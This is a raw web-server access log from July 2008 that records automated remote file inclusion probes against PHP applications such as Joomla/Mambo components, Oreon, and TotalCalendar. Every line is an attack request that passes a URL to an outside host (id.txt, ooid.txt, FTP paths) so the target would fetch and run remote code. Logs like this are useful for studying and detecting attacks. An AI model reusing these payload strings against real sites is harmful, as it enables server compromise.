200.219.232.65 - - [06/Jul/2008:10:06:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:06:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:06:17 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:06:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:06:42 -0700] "GET /logs/access_080220.log/include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:06:42 -0700] "GET /include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:06:42 -0700] "GET /logs/include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:06:54 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:07:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:07:22 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:07:23 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:07:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:07:34 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:07:34 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:07:34 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:07:34 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:07:34 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:07:36 -0700] "GET /logs/access_080103.log/include/logout.php?PSA_PATH=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:07:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:07:43 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:10:07:44 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:04 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:04 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:08:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:10:08:10 -0700] "GET /logs/mcf.php?content=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:10:08:10 -0700] "GET /mcf.php?content=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:08:13 -0700] "GET /logs/access_080103.log/aedatingCMS.php?dir[inc]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:08:13 -0700] "GET /aedatingCMS.php?dir[inc]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:08:13 -0700] "GET /logs/aedatingCMS.php?dir[inc]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:08:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:10:08:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:10:08:20 -0700] "GET /-http://www.sisters4u.de/guestbook//logs/testar.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:10:08:20 -0700] "GET /logs/-http://www.sisters4u.de/guestbook//logs/testar.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:27 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:27 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:27 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:28 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:08:28 -0700] "GET /logs/access_071130.log/aedatingCMS.php?dir[inc]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:40 -0700] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:41 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:41 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:41 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:41 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:10:08:42 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/luthercorp1/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:45 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:48 -0700] "GET /logs/access_080329.log//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:48 -0700] "GET //atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:48 -0700] "GET /logs//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:08:49 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
116.125.113.115 - - [06/Jul/2008:10:08:59 -0700] "GET /*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:09:00 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:04 -0700] "GET /logs/access_080312.log//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:09 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:09 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:09 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:18 -0700] "GET /logs/access_080329.log//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:18 -0700] "GET //atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:18 -0700] "GET /logs//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:09:20 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:09:20 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:36 -0700] "GET /logs/access_080312.log//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:09:37 -0700] "GET /logs///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:09:37 -0700] "GET ///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:09:50 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [06/Jul/2008:10:09:50 -0700] "GET /logs/access_080225.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:09:50 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:09:59 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:10:00 -0700] "GET /logs/access.log/index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:01 -0700] "GET /logs/access_080329.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:02 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:03 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:10:03 -0700] "GET /index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 200 18419 "-" "libwww-perl/5.65" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:10:03 -0700] "GET /logs/index.php?opcao=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.135.183.134 - - [06/Jul/2008:10:10:03 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:10:12 -0700] "GET ///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:10:12 -0700] "GET /logs///plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:38 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:38 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:38 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:10:43 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:10:43 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:10:50 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
70.85.48.194 - - [06/Jul/2008:10:10:52 -0700] "GET //index.php?option=com_custompages&cpage=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 200 18479 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:57 -0700] "GET /logs/access_080121.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:57 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:10:57 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:10:57 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:11:01 -0700] "GET /logs///newspublish/include.php?path[docroot]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:11:02 -0700] "GET ///newspublish/include.php?path[docroot]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
61.9.60.141 - - [06/Jul/2008:10:11:11 -0700] "GET /logs/access_080313.log/index1.php?=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.60.141 - - [06/Jul/2008:10:11:12 -0700] "GET /index1.php?=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.9.60.141 - - [06/Jul/2008:10:11:12 -0700] "GET /logs/index1.php?=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:11:17 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.79" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:10:11:22 -0700] "GET /logs/access_080108.log/index2.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:10:11:27 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:10:11:27 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:11:28 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:11:30 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:11:30 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:11:30 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:11:33 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:11:38 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:11:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:11:48 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
